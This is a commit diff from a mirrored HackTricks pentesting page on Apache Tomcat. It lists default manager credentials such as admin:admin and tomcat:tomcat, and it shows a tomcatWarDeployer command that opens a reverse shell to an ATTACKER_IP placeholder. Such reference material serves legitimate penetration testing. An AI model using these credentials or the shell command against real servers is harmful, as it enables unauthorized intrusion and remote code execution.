mirror of
https://github.com/carlospolop/hacktricks.git
synced 2023-12-14 19:12:55 +01:00
GitBook: [master] one page modified
This commit is contained in:
parent
b1b10f518f
commit
cd810d6b8a
|
@ -16,7 +16,7 @@ msf> use auxiliary/scanner/http/tomcat_enum
|
|||
|
||||
## Default credentials
|
||||
|
||||
The most interesting path of Tomcat is _/manager/html_, inside that path you can upload and deploy war files \(execute code\). But this path is protected by basic TTP auth, the most common credentials are:
|
||||
The most interesting path of Tomcat is _**/manager/html**_, inside that path you can upload and deploy war files \(execute code\). But this path is protected by basic TTP auth, the most common credentials are:
|
||||
|
||||
* admin:admin
|
||||
* tomcat:tomcat
|
||||
|
@ -127,7 +127,7 @@ git clone https://github.com/mgeeky/tomcatWarDeployer.git
|
|||
#### Reverse shell
|
||||
|
||||
```bash
|
||||
./tomcatWarDeployer.py -U <username> -P <password>-H <ATTACKER_IP> -p <ATTACKER_PORT> <VICTIM_IP>:<VICTIM_PORT>/manager/html/
|
||||
./tomcatWarDeployer.py -U <username> -P <password> -H <ATTACKER_IP> -p <ATTACKER_PORT> <VICTIM_IP>:<VICTIM_PORT>/manager/html/
|
||||
```
|
||||
|
||||
#### Bind shell
|
||||
|
|
Loading…
Reference in a new issue